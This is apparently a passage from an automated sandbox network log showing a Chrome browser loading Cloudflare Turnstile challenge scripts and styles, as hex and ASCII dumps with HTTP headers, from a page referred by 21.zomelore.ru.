                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                          Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          12192.168.2.449757104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:55 UTC794OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                          Referer: https://21.zomelore.ru/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:56 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 26677
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                          origin-agent-cluster: ?1
                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                          referrer-policy: same-origin
                                                                                                                                                                                                          document-policy: js-profiling
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 30 39 34 30 66 65 36 63 34 66 34 33 37 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8f0940fe6c4f4373-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                                                                          Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                                                                          Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                                                                                                                                                                          Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65
                                                                                                                                                                                                          Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33
                                                                                                                                                                                                          Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70
                                                                                                                                                                                                          Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78
                                                                                                                                                                                                          Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a
                                                                                                                                                                                                          Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          13192.168.2.449761104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:57 UTC727OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8f0940fe6c4f4373&lang=auto HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
